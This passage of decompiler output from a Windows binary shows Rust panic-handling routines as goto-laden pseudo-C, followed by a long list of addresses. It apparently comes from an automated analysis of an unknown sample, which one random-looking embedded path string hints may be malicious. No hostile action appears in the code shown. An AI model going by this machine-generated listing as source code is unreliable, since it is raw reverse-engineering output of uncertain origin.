                                                                                                                                                                                      						goto L17;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t333 =  &_v68;
                                                                                                                                                                                      					_v68 = 0x6ea20224;
                                                                                                                                                                                      					_v64 = 1;
                                                                                                                                                                                      					_v60 = 0;
                                                                                                                                                                                      					_v52 = 0x6ea1f570;
                                                                                                                                                                                      					_v120 = 0;
                                                                                                                                                                                      					_v124 = 0;
                                                                                                                                                                                      					_v48 = 0;
                                                                                                                                                                                      					_t197 = E6E9DD0F0( &_v124, __eflags);
                                                                                                                                                                                      					__eflags = _t197 - 3;
                                                                                                                                                                                      					if(_t197 != 3) {
                                                                                                                                                                                      						goto L17;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						_v20 = 1;
                                                                                                                                                                                      						_v36 = _t333;
                                                                                                                                                                                      						 *((intOrPtr*)( *((intOrPtr*)(_t333 + 4))))( *_t333);
                                                                                                                                                                                      						_t348 = _t348 + 4;
                                                                                                                                                                                      						goto L12;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					_v132 = _t278;
                                                                                                                                                                                      					__imp__AcquireSRWLockShared(0x6ea2e11c);
                                                                                                                                                                                      					_v144 = 0x6ea2e11c;
                                                                                                                                                                                      					_v20 = 2;
                                                                                                                                                                                      					_v136 = _t268;
                                                                                                                                                                                      					_v140 = _t337;
                                                                                                                                                                                      					_t263 =  *((intOrPtr*)(_t337 + 0x10))(_t268);
                                                                                                                                                                                      					_t348 = _t348 + 4;
                                                                                                                                                                                      					_v36 = _t263;
                                                                                                                                                                                      					_v40 = _t314;
                                                                                                                                                                                      					_t197 = E6E9DD000(_t268, _t337);
                                                                                                                                                                                      					_t337 = _v40;
                                                                                                                                                                                      					_t352 = _t197;
                                                                                                                                                                                      					if(_t197 != 0) {
                                                                                                                                                                                      						L18:
                                                                                                                                                                                      						__eflags =  *_t197 - 1;
                                                                                                                                                                                      						_t280 = 1;
                                                                                                                                                                                      						if( *_t197 <= 1) {
                                                                                                                                                                                      							_t198 =  *0x6ea2e110; // 0x0
                                                                                                                                                                                      							_t316 = _a8;
                                                                                                                                                                                      							__eflags = _t198 - 2;
                                                                                                                                                                                      							if(_t198 == 2) {
                                                                                                                                                                                      								_t280 = 0;
                                                                                                                                                                                      								goto L20;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _t198 - 1;
                                                                                                                                                                                      							if(_t198 == 1) {
                                                                                                                                                                                      								_t280 = 4;
                                                                                                                                                                                      								goto L20;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _t198;
                                                                                                                                                                                      							if(_t198 != 0) {
                                                                                                                                                                                      								goto L20;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							E6E9DD380(_t268,  &_v68, _t337, _t340);
                                                                                                                                                                                      							_t337 = _v40;
                                                                                                                                                                                      							_t251 = _v68;
                                                                                                                                                                                      							__eflags = _t251;
                                                                                                                                                                                      							if(_t251 != 0) {
                                                                                                                                                                                      								goto L69;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t271 = 5;
                                                                                                                                                                                      							goto L87;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t316 = _a8;
                                                                                                                                                                                      						goto L20;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						E6E9F95A0(_t268,  &M6EA1F8F7, 0x46, _t352,  &_v68, 0x6ea1f870, 0x6ea1f9bc);
                                                                                                                                                                                      						_t348 = _t348 + 0xc;
                                                                                                                                                                                      						L62:
                                                                                                                                                                                      						asm("ud2");
                                                                                                                                                                                      						L63:
                                                                                                                                                                                      						_t281 = "Box<dyn Any><unnamed>thread \'\' panicked at \'\', ";
                                                                                                                                                                                      						_t204 = 0xc;
                                                                                                                                                                                      						L22:
                                                                                                                                                                                      						_v100 = _t281;
                                                                                                                                                                                      						_v96 = _t204;
                                                                                                                                                                                      						_t205 =  *0x6ea2d044; // 0x0
                                                                                                                                                                                      						if(_t205 == 0) {
                                                                                                                                                                                      							_t285 = 0x6ea2d044;
                                                                                                                                                                                      							_t205 = E6E9E2960(_t268, 0x6ea2d044, _t337, _t340);
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t197 = TlsGetValue(_t205);
                                                                                                                                                                                      						if(_t197 <= 1) {
                                                                                                                                                                                      							L43:
                                                                                                                                                                                      							_t206 =  *0x6ea2d044; // 0x0
                                                                                                                                                                                      							__eflags = _t206;
                                                                                                                                                                                      							if(_t206 == 0) {
                                                                                                                                                                                      								_t285 = 0x6ea2d044;
                                                                                                                                                                                      								_t206 = E6E9E2960(_t268, 0x6ea2d044, _t337, _t340);
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t197 = TlsGetValue(_t206);
                                                                                                                                                                                      							__eflags = _t197;
                                                                                                                                                                                      							if(_t197 == 0) {
                                                                                                                                                                                      								_t207 =  *0x6ea2e128; // 0x720000
                                                                                                                                                                                      								__eflags = _t207;
                                                                                                                                                                                      								if(_t207 != 0) {
                                                                                                                                                                                      									L67:
                                                                                                                                                                                      									_t208 = HeapAlloc(_t207, 0, 0x10);
                                                                                                                                                                                      									__eflags = _t208;
                                                                                                                                                                                      									if(__eflags != 0) {
                                                                                                                                                                                      										 *_t208 = 0;
                                                                                                                                                                                      										 *(_t208 + 0xc) = 0x6ea2d044;
                                                                                                                                                                                      										_t340 = _t208;
                                                                                                                                                                                      										_t209 =  *0x6ea2d044; // 0x0
                                                                                                                                                                                      										__eflags = _t209;
                                                                                                                                                                                      										if(_t209 == 0) {
                                                                                                                                                                                      											_v36 = _t340;
                                                                                                                                                                                      											_t209 = E6E9E2960(_t268, 0x6ea2d044, _t337, _t340);
                                                                                                                                                                                      											_t340 = _v36;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										_t197 = TlsSetValue(_t209, _t340);
                                                                                                                                                                                      										goto L76;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									L68:
                                                                                                                                                                                      									_t251 = E6E9F92F0(_t268, 0x10, 4, _t337, _t340, __eflags);
                                                                                                                                                                                      									asm("ud2");
                                                                                                                                                                                      									L69:
                                                                                                                                                                                      									_t332 = _v60;
                                                                                                                                                                                      									_t303 = _v64;
                                                                                                                                                                                      									__eflags = _t332 - 4;
                                                                                                                                                                                      									if(_t332 == 4) {
                                                                                                                                                                                      										__eflags =  *_t251 - 0x6c6c7566;
                                                                                                                                                                                      										if( *_t251 != 0x6c6c7566) {
                                                                                                                                                                                      											L84:
                                                                                                                                                                                      											_t340 = 2;
                                                                                                                                                                                      											_t271 = 0;
                                                                                                                                                                                      											__eflags = 0;
                                                                                                                                                                                      											L85:
                                                                                                                                                                                      											__eflags = _t303;
                                                                                                                                                                                      											if(_t303 != 0) {
                                                                                                                                                                                      												HeapFree( *0x6ea2e128, 0, _t251);
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L87:
                                                                                                                                                                                      											__eflags = _t271 - 5;
                                                                                                                                                                                      											_t316 = _a8;
                                                                                                                                                                                      											_t273 =  !=  ? _t340 : 1;
                                                                                                                                                                                      											_t280 =  !=  ? _t271 & 0x000000ff : 4;
                                                                                                                                                                                      											_t144 =  !=  ? _t340 : 1;
                                                                                                                                                                                      											_t268 =  *0x6ea2e110;
                                                                                                                                                                                      											 *0x6ea2e110 =  !=  ? _t340 : 1;
                                                                                                                                                                                      											L20:
                                                                                                                                                                                      											_v148 = _t316;
                                                                                                                                                                                      											_v128 = _t280;
                                                                                                                                                                                      											_t61 = _t337 + 0xc; // 0x6e9e3290
                                                                                                                                                                                      											_t199 =  *_t61;
                                                                                                                                                                                      											_v40 = _t199;
                                                                                                                                                                                      											_t200 =  *_t199(_v36);
                                                                                                                                                                                      											_t348 = _t348 + 4;
                                                                                                                                                                                      											_t318 = _t316 ^ 0x7ef2a91e | _t200 ^ 0xecc7bcf4;
                                                                                                                                                                                      											__eflags = _t318;
                                                                                                                                                                                      											if(__eflags != 0) {
                                                                                                                                                                                      												_t202 = _v40(_v36);
                                                                                                                                                                                      												_t348 = _t348 + 4;
                                                                                                                                                                                      												__eflags = _t318 ^ 0xe43a67d8 | _t202 ^ 0xbae7a625;
                                                                                                                                                                                      												if(__eflags != 0) {
                                                                                                                                                                                      													goto L63;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												_t254 = _v36;
                                                                                                                                                                                      												_t281 =  *_t254;
                                                                                                                                                                                      												_t204 = _t254[2];
                                                                                                                                                                                      												goto L22;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											_t255 = _v36;
                                                                                                                                                                                      											_t281 =  *_t255;
                                                                                                                                                                                      											_t204 = _t255[1];
                                                                                                                                                                                      											goto L22;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										_t271 = 1;
                                                                                                                                                                                      										_t340 = 3;
                                                                                                                                                                                      										goto L85;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									__eflags = _t332 - 1;
                                                                                                                                                                                      									if(_t332 != 1) {
                                                                                                                                                                                      										goto L84;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									__eflags =  *_t251 - 0x30;
                                                                                                                                                                                      									if( *_t251 != 0x30) {
                                                                                                                                                                                      										goto L84;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									_t271 = 4;
                                                                                                                                                                                      									_t340 = 1;
                                                                                                                                                                                      									goto L85;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_t207 = GetProcessHeap();
                                                                                                                                                                                      								__eflags = _t207;
                                                                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                                                                      									goto L68;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								 *0x6ea2e128 = _t207;
                                                                                                                                                                                      								goto L67;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								_t340 = _t197;
                                                                                                                                                                                      								__eflags = _t197 - 1;
                                                                                                                                                                                      								if(_t197 != 1) {
                                                                                                                                                                                      									L76:
                                                                                                                                                                                      									_t282 =  *(_t340 + 8);
                                                                                                                                                                                      									__eflags =  *_t340;
                                                                                                                                                                                      									_t138 = _t340 + 4; // 0x4
                                                                                                                                                                                      									_t337 = _t138;
                                                                                                                                                                                      									 *_t340 = 1;
                                                                                                                                                                                      									 *(_t340 + 4) = 0;
                                                                                                                                                                                      									 *(_t340 + 8) = 0;
                                                                                                                                                                                      									if(__eflags != 0) {
                                                                                                                                                                                      										__eflags = _t282;
                                                                                                                                                                                      										if(__eflags != 0) {
                                                                                                                                                                                      											asm("lock dec dword [ecx]");
                                                                                                                                                                                      											if(__eflags == 0) {
                                                                                                                                                                                      												_t197 = E6E9DC640(_t282);
                                                                                                                                                                                      											}
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      									goto L27;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_v84 = 0;
                                                                                                                                                                                      								_v36 = 0;
                                                                                                                                                                                      								_t213 = 0;
                                                                                                                                                                                      								__eflags = 0;
                                                                                                                                                                                      								goto L48;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							_t337 = _t197;
                                                                                                                                                                                      							if( *_t197 != 1) {
                                                                                                                                                                                      								goto L43;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t337 = _t337 + 4;
                                                                                                                                                                                      							L27:
                                                                                                                                                                                      							if( *_t337 != 0) {
                                                                                                                                                                                      								E6E9F95A0(_t268, "already borrowedC:cmfltobzsqiwzwswifceeeiuunqkihdnyjizwfcsrqtsqkmwekwaanfzackndqagesnhktvjovmkrgyplrusstvgwloxgtnnoxmtpmkzzsudqjpdkuwbmncfcubd", 0x10, __eflags,  &_v68, 0x6ea1f860, 0x6ea1ff30);
                                                                                                                                                                                      								_t348 = _t348 + 0xc;
                                                                                                                                                                                      								goto L62;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							 *_t337 = 0xffffffff;
                                                                                                                                                                                      							_t340 =  *(_t337 + 4);
                                                                                                                                                                                      							if(_t340 == 0) {
                                                                                                                                                                                      								_v36 = _t337;
                                                                                                                                                                                      								_v20 = 8;
                                                                                                                                                                                      								_t250 = E6E9DC4D0(_t268, _t337, _t340);
                                                                                                                                                                                      								_t337 = _v36;
                                                                                                                                                                                      								_t340 = _t250;
                                                                                                                                                                                      								_t197 =  *(_t337 + 4);
                                                                                                                                                                                      								_t359 = _t197;
                                                                                                                                                                                      								if(_t359 != 0) {
                                                                                                                                                                                      									asm("lock dec dword [eax]");
                                                                                                                                                                                      									if(_t359 == 0) {
                                                                                                                                                                                      										_t285 =  *(_t337 + 4);
                                                                                                                                                                                      										_t197 = E6E9DC640(_t285);
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      								 *(_t337 + 4) = _t340;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							asm("lock inc dword [esi]");
                                                                                                                                                                                      							if(_t359 <= 0) {
                                                                                                                                                                                      								L17:
                                                                                                                                                                                      								asm("ud2");
                                                                                                                                                                                      								asm("ud2");
                                                                                                                                                                                      								goto L18;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								 *_t337 =  *_t337 + 1;
                                                                                                                                                                                      								_v84 = _t340;
                                                                                                                                                                                      								_v36 = _t340;
                                                                                                                                                                                      								if(_t340 != 0) {
                                                                                                                                                                                      									_t212 =  *(_t340 + 0x10);
                                                                                                                                                                                      									__eflags = _t212;
                                                                                                                                                                                      									_t285 =  ==  ? _t212 : _t340 + 0x10;
                                                                                                                                                                                      									__eflags = _t285;
                                                                                                                                                                                      									if(__eflags != 0) {
                                                                                                                                                                                      										L104:
                                                                                                                                                                                      										_t213 =  *_t285;
                                                                                                                                                                                      										_t285 =  *((intOrPtr*)(4 + _t285)) - 1;
                                                                                                                                                                                      										L105:
                                                                                                                                                                                      										_v20 = 3;
                                                                                                                                                                                      										L48:
                                                                                                                                                                                      										_v124 = 0x6ea2010c;
                                                                                                                                                                                      										_v120 = 4;
                                                                                                                                                                                      										_v72 = 0;
                                                                                                                                                                                      										_v88 = 0;
                                                                                                                                                                                      										_v92 = 0;
                                                                                                                                                                                      										_v116 = 0;
                                                                                                                                                                                      										_v20 = 3;
                                                                                                                                                                                      										_t323 =  !=  ? _t213 : "<unnamed>thread \'\' panicked at \'\', ";
                                                                                                                                                                                      										_t215 =  !=  ? _t285 : 9;
                                                                                                                                                                                      										_v80 =  !=  ? _t213 : "<unnamed>thread \'\' panicked at \'\', ";
                                                                                                                                                                                      										_t324 =  &_v124;
                                                                                                                                                                                      										_v76 =  !=  ? _t285 : 9;
                                                                                                                                                                                      										_v68 =  &_v80;
                                                                                                                                                                                      										_v64 = 0x6e9ddca0;
                                                                                                                                                                                      										_v60 =  &_v100;
                                                                                                                                                                                      										_v56 = 0x6e9ddca0;
                                                                                                                                                                                      										_v52 =  &_v148;
                                                                                                                                                                                      										_v48 = E6E9DDCC0;
                                                                                                                                                                                      										_v108 =  &_v68;
                                                                                                                                                                                      										_v104 = 3;
                                                                                                                                                                                      										if(E6E9DD0F0( &_v92, _t213) == 3) {
                                                                                                                                                                                      											_v20 = 7;
                                                                                                                                                                                      											_v40 = _t324;
                                                                                                                                                                                      											 *((intOrPtr*)( *((intOrPtr*)(_t324 + 4))))( *_t324);
                                                                                                                                                                                      											_t348 = _t348 + 4;
                                                                                                                                                                                      											_t343 = _v40;
                                                                                                                                                                                      											_t300 =  *((intOrPtr*)(_t343 + 4));
                                                                                                                                                                                      											if( *((intOrPtr*)(_t300 + 4)) != 0) {
                                                                                                                                                                                      												_t248 =  *_t343;
                                                                                                                                                                                      												if( *((intOrPtr*)(_t300 + 8)) >= 9) {
                                                                                                                                                                                      													_t248 =  *(_t248 - 4);
                                                                                                                                                                                      												}
                                                                                                                                                                                      												HeapFree( *0x6ea2e128, 0, _t248);
                                                                                                                                                                                      											}
                                                                                                                                                                                      											HeapFree( *0x6ea2e128, 0, _t343);
                                                                                                                                                                                      										}
                                                                                                                                                                                      										_t269 = _v128;
                                                                                                                                                                                      										_t222 =  <  ? (_t269 + 0x000000fd & 0x000000ff) + 1 : 0;
                                                                                                                                                                                      										if(_t222 == 0) {
                                                                                                                                                                                      											__imp__AcquireSRWLockExclusive(0x6ea2e10c);
                                                                                                                                                                                      											_v68 = 0x6ea1fad0;
                                                                                                                                                                                      											_v64 = 1;
                                                                                                                                                                                      											_v152 = 0x6ea2e10c;
                                                                                                                                                                                      											_v41 = _t269;
                                                                                                                                                                                      											_v60 = 0;
                                                                                                                                                                                      											_v20 = 6;
                                                                                                                                                                                      											_v124 =  &_v41;
                                                                                                                                                                                      											_v120 = E6E9DDD30;
                                                                                                                                                                                      											_v52 =  &_v124;
                                                                                                                                                                                      											_v48 = 1;
                                                                                                                                                                                      											_t225 = E6E9DD0F0( &_v92, __eflags);
                                                                                                                                                                                      											_t341 =  &_v68;
                                                                                                                                                                                      											__imp__ReleaseSRWLockExclusive(0x6ea2e10c);
                                                                                                                                                                                      											__eflags = _t225 - 3;
                                                                                                                                                                                      											if(__eflags != 0) {
                                                                                                                                                                                      												goto L95;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											_v20 = 5;
                                                                                                                                                                                      											_v40 = _t341;
                                                                                                                                                                                      											 *((intOrPtr*)( *((intOrPtr*)(_t341 + 4))))( *_t341);
                                                                                                                                                                                      											_t348 = _t348 + 4;
                                                                                                                                                                                      											goto L90;
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											if(_t222 == 1) {
                                                                                                                                                                                      												L95:
                                                                                                                                                                                      												_t372 = _v36;
                                                                                                                                                                                      												if(_t372 != 0) {
                                                                                                                                                                                      													asm("lock dec dword [eax]");
                                                                                                                                                                                      													if(_t372 == 0) {
                                                                                                                                                                                      														E6E9DC640(_v84);
                                                                                                                                                                                      													}
                                                                                                                                                                                      												}
                                                                                                                                                                                      												_t342 = _v140;
                                                                                                                                                                                      												_t338 = _v136;
                                                                                                                                                                                      												_t373 = _v72;
                                                                                                                                                                                      												if(_t373 != 0) {
                                                                                                                                                                                      													asm("lock dec dword [eax]");
                                                                                                                                                                                      													if(_t373 == 0) {
                                                                                                                                                                                      														E6E9DDA70(_v72);
                                                                                                                                                                                      													}
                                                                                                                                                                                      												}
                                                                                                                                                                                      												__imp__ReleaseSRWLockShared(0x6ea2e11c);
                                                                                                                                                                                      												_t374 = _v132 - 1;
                                                                                                                                                                                      												_v20 = 0xffffffff;
                                                                                                                                                                                      												if(_v132 > 1) {
                                                                                                                                                                                      													_v68 = 0x6ea2029c;
                                                                                                                                                                                      													_v64 = 1;
                                                                                                                                                                                      													_v60 = 0;
                                                                                                                                                                                      													_v52 = 0x6ea1f570;
                                                                                                                                                                                      													_v76 = 0;
                                                                                                                                                                                      													_v80 = 0;
                                                                                                                                                                                      													_v48 = 0;
                                                                                                                                                                                      													_t229 = E6E9DD0F0( &_v80, _t374);
                                                                                                                                                                                      													_v120 =  &_v68;
                                                                                                                                                                                      													_v124 = _t229;
                                                                                                                                                                                      													E6E9DD2B0( &_v124);
                                                                                                                                                                                      													asm("ud2");
                                                                                                                                                                                      													asm("ud2");
                                                                                                                                                                                      												}
                                                                                                                                                                                      												_t285 = _t338;
                                                                                                                                                                                      												E6E9DD290(_t285, _t342);
                                                                                                                                                                                      												asm("ud2");
                                                                                                                                                                                      												goto L104;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											 *0x6ea2d040 = 0;
                                                                                                                                                                                      											_t368 =  *0x6ea2d040;
                                                                                                                                                                                      											if( *0x6ea2d040 == 0) {
                                                                                                                                                                                      												goto L95;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											_t330 =  &_v68;
                                                                                                                                                                                      											_v68 = 0x6ea2017c;
                                                                                                                                                                                      											_v64 = 1;
                                                                                                                                                                                      											_v60 = 0;
                                                                                                                                                                                      											_v52 = 0x6ea1f570;
                                                                                                                                                                                      											_v48 = 0;
                                                                                                                                                                                      											_v20 = 3;
                                                                                                                                                                                      											if(E6E9DD0F0( &_v92, _t368) != 3) {
                                                                                                                                                                                      												goto L95;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											_v40 = _t330;
                                                                                                                                                                                      											_v20 = 4;
                                                                                                                                                                                      											 *((intOrPtr*)( *((intOrPtr*)(_t330 + 4))))( *_t330);
                                                                                                                                                                                      											_t348 = _t348 + 4;
                                                                                                                                                                                      											L90:
                                                                                                                                                                                      											_t296 =  *((intOrPtr*)(_v40 + 4));
                                                                                                                                                                                      											if( *((intOrPtr*)(_t296 + 4)) != 0) {
                                                                                                                                                                                      												_t238 =  *_v40;
                                                                                                                                                                                      												if( *((intOrPtr*)(_t296 + 8)) >= 9) {
                                                                                                                                                                                      													_t238 =  *(_t238 - 4);
                                                                                                                                                                                      												}
                                                                                                                                                                                      												HeapFree( *0x6ea2e128, 0, _t238);
                                                                                                                                                                                      											}
                                                                                                                                                                                      											HeapFree( *0x6ea2e128, 0, _v40);
                                                                                                                                                                                      											goto L95;
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      									_t213 = 0;
                                                                                                                                                                                      									goto L105;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_t213 = 0;
                                                                                                                                                                                      								goto L48;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}

































































































                                                                                                                                                                                      0x6e9dc6d7
                                                                                                                                                                                      0x6e9dc6da
                                                                                                                                                                                      0x6e9dc6de
                                                                                                                                                                                      0x6e9dc6e5
                                                                                                                                                                                      0x6e9dc6e6
                                                                                                                                                                                      0x6e9dc6e8
                                                                                                                                                                                      0x6e9dc6ed
                                                                                                                                                                                      0x6e9dc6f0
                                                                                                                                                                                      0x6e9dc6f2
                                                                                                                                                                                      0x6e9dc6f3
                                                                                                                                                                                      0x6e9dc6f4
                                                                                                                                                                                      0x6e9dc6f5
                                                                                                                                                                                      0x6e9dc6f6
                                                                                                                                                                                      0x6e9dc6f7
                                                                                                                                                                                      0x6e9dc6f8
                                                                                                                                                                                      0x6e9dc6f9
                                                                                                                                                                                      0x6e9dc6fa
                                                                                                                                                                                      0x6e9dc6fb
                                                                                                                                                                                      0x6e9dc6fc
                                                                                                                                                                                      0x6e9dc6fd
                                                                                                                                                                                      0x6e9dc6fe
                                                                                                                                                                                      0x6e9dc6ff
                                                                                                                                                                                      0x6e9dc706
                                                                                                                                                                                      0x6e9dc70c
                                                                                                                                                                                      0x6e9dc70f
                                                                                                                                                                                      0x6e9dc716
                                                                                                                                                                                      0x6e9dc71d
                                                                                                                                                                                      0x6e9dc722
                                                                                                                                                                                      0x6e9dc727
                                                                                                                                                                                      0x6e9dc730
                                                                                                                                                                                      0x6e9dc733
                                                                                                                                                                                      0x6e9dc739
                                                                                                                                                                                      0x6e9dc741
                                                                                                                                                                                      0x6e9dc746
                                                                                                                                                                                      0x6e9dc748
                                                                                                                                                                                      0x6e9dc762
                                                                                                                                                                                      0x6e9dc767
                                                                                                                                                                                      0x6e9dc76a
                                                                                                                                                                                      0x6e9dc76a
                                                                                                                                                                                      0x6e9dc76e
                                                                                                                                                                                      0x6e9dc771
                                                                                                                                                                                      0x6e9dc774
                                                                                                                                                                                      0x6e9dc776
                                                                                                                                                                                      0x6e9dc7ea
                                                                                                                                                                                      0x6e9dc7ed
                                                                                                                                                                                      0x6e9dc84a
                                                                                                                                                                                      0x6e9dc851
                                                                                                                                                                                      0x6e9dc85b
                                                                                                                                                                                      0x6e9dc862
                                                                                                                                                                                      0x6e9dc869
                                                                                                                                                                                      0x6e9dc86d
                                                                                                                                                                                      0x6e9dc874
                                                                                                                                                                                      0x6e9dc87b
                                                                                                                                                                                      0x6e9dc881
                                                                                                                                                                                      0x6e9dc884
                                                                                                                                                                                      0x6e9dc887
                                                                                                                                                                                      0x6e9dc88d
                                                                                                                                                                                      0x6e9dc894
                                                                                                                                                                                      0x6e9dc897
                                                                                                                                                                                      0x6e9dc89e
                                                                                                                                                                                      0x6e9dc8a3
                                                                                                                                                                                      0x6e9dc8a5
                                                                                                                                                                                      0x6e9dc8ac
                                                                                                                                                                                      0x6e9dc8b4
                                                                                                                                                                                      0x6e9dc8b7
                                                                                                                                                                                      0x6e9dc8b9
                                                                                                                                                                                      0x6e9dc8bc
                                                                                                                                                                                      0x6e9dc8bc
                                                                                                                                                                                      0x6e9dc8bf
                                                                                                                                                                                      0x6e9dc8c2
                                                                                                                                                                                      0x6e9dc8c6
                                                                                                                                                                                      0x6e9dc8dc
                                                                                                                                                                                      0x6e9dc8dc
                                                                                                                                                                                      0x6e9dc8ea
                                                                                                                                                                                      0x6e9dc8ea
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc8a5
                                                                                                                                                                                      0x6e9dc7f2
                                                                                                                                                                                      0x6e9dc7f5
                                                                                                                                                                                      0x6e9dc7fc
                                                                                                                                                                                      0x6e9dc803
                                                                                                                                                                                      0x6e9dc80a
                                                                                                                                                                                      0x6e9dc811
                                                                                                                                                                                      0x6e9dc815
                                                                                                                                                                                      0x6e9dc81c
                                                                                                                                                                                      0x6e9dc823
                                                                                                                                                                                      0x6e9dc828
                                                                                                                                                                                      0x6e9dc82a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc830
                                                                                                                                                                                      0x6e9dc835
                                                                                                                                                                                      0x6e9dc83d
                                                                                                                                                                                      0x6e9dc840
                                                                                                                                                                                      0x6e9dc842
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc842
                                                                                                                                                                                      0x6e9dc77d
                                                                                                                                                                                      0x6e9dc77d
                                                                                                                                                                                      0x6e9dc785
                                                                                                                                                                                      0x6e9dc78b
                                                                                                                                                                                      0x6e9dc795
                                                                                                                                                                                      0x6e9dc79c
                                                                                                                                                                                      0x6e9dc7a3
                                                                                                                                                                                      0x6e9dc7a9
                                                                                                                                                                                      0x6e9dc7ac
                                                                                                                                                                                      0x6e9dc7af
                                                                                                                                                                                      0x6e9dc7b2
                                                                                                                                                                                      0x6e9dc7b5
                                                                                                                                                                                      0x6e9dc7ba
                                                                                                                                                                                      0x6e9dc7bd
                                                                                                                                                                                      0x6e9dc7bf
                                                                                                                                                                                      0x6e9dc8f3
                                                                                                                                                                                      0x6e9dc8f3
                                                                                                                                                                                      0x6e9dc8f6
                                                                                                                                                                                      0x6e9dc8f8
                                                                                                                                                                                      0x6e9dc9cb
                                                                                                                                                                                      0x6e9dc9d0
                                                                                                                                                                                      0x6e9dc9d3
                                                                                                                                                                                      0x6e9dc9d6
                                                                                                                                                                                      0x6e9dcbd7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcbd7
                                                                                                                                                                                      0x6e9dc9dc
                                                                                                                                                                                      0x6e9dc9df
                                                                                                                                                                                      0x6e9dcbd0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcbd0
                                                                                                                                                                                      0x6e9dc9e5
                                                                                                                                                                                      0x6e9dc9e7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc9f0
                                                                                                                                                                                      0x6e9dc9f5
                                                                                                                                                                                      0x6e9dc9f8
                                                                                                                                                                                      0x6e9dc9fb
                                                                                                                                                                                      0x6e9dc9fd
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dca03
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dca03
                                                                                                                                                                                      0x6e9dc8fe
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dc7c5
                                                                                                                                                                                      0x6e9dc7dd
                                                                                                                                                                                      0x6e9dc7e2
                                                                                                                                                                                      0x6e9dcbfe
                                                                                                                                                                                      0x6e9dcbfe
                                                                                                                                                                                      0x6e9dcc00
                                                                                                                                                                                      0x6e9dcc00
                                                                                                                                                                                      0x6e9dcc05
                                                                                                                                                                                      0x6e9dc933
                                                                                                                                                                                      0x6e9dc933
                                                                                                                                                                                      0x6e9dc936
                                                                                                                                                                                      0x6e9dc939
                                                                                                                                                                                      0x6e9dc940
                                                                                                                                                                                      0x6e9dc942
                                                                                                                                                                                      0x6e9dc947
                                                                                                                                                                                      0x6e9dc947
                                                                                                                                                                                      0x6e9dc94d
                                                                                                                                                                                      0x6e9dc956
                                                                                                                                                                                      0x6e9dca33
                                                                                                                                                                                      0x6e9dca33
                                                                                                                                                                                      0x6e9dca38
                                                                                                                                                                                      0x6e9dca3a
                                                                                                                                                                                      0x6e9dca3c
                                                                                                                                                                                      0x6e9dca41
                                                                                                                                                                                      0x6e9dca41
                                                                                                                                                                                      0x6e9dca47
                                                                                                                                                                                      0x6e9dca4d
                                                                                                                                                                                      0x6e9dca4f
                                                                                                                                                                                      0x6e9dcc0f
                                                                                                                                                                                      0x6e9dcc14
                                                                                                                                                                                      0x6e9dcc16
                                                                                                                                                                                      0x6e9dcc26
                                                                                                                                                                                      0x6e9dcc2b
                                                                                                                                                                                      0x6e9dcc30
                                                                                                                                                                                      0x6e9dcc32
                                                                                                                                                                                      0x6e9dcc72
                                                                                                                                                                                      0x6e9dcc78
                                                                                                                                                                                      0x6e9dcc7f
                                                                                                                                                                                      0x6e9dcc81
                                                                                                                                                                                      0x6e9dcc86
                                                                                                                                                                                      0x6e9dcc88
                                                                                                                                                                                      0x6e9dcc8f
                                                                                                                                                                                      0x6e9dcc92
                                                                                                                                                                                      0x6e9dcc97
                                                                                                                                                                                      0x6e9dcc97
                                                                                                                                                                                      0x6e9dcc9c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dcc9c
                                                                                                                                                                                      0x6e9dcc34
                                                                                                                                                                                      0x6e9dcc3e
                                                                                                                                                                                      0x6e9dcc43
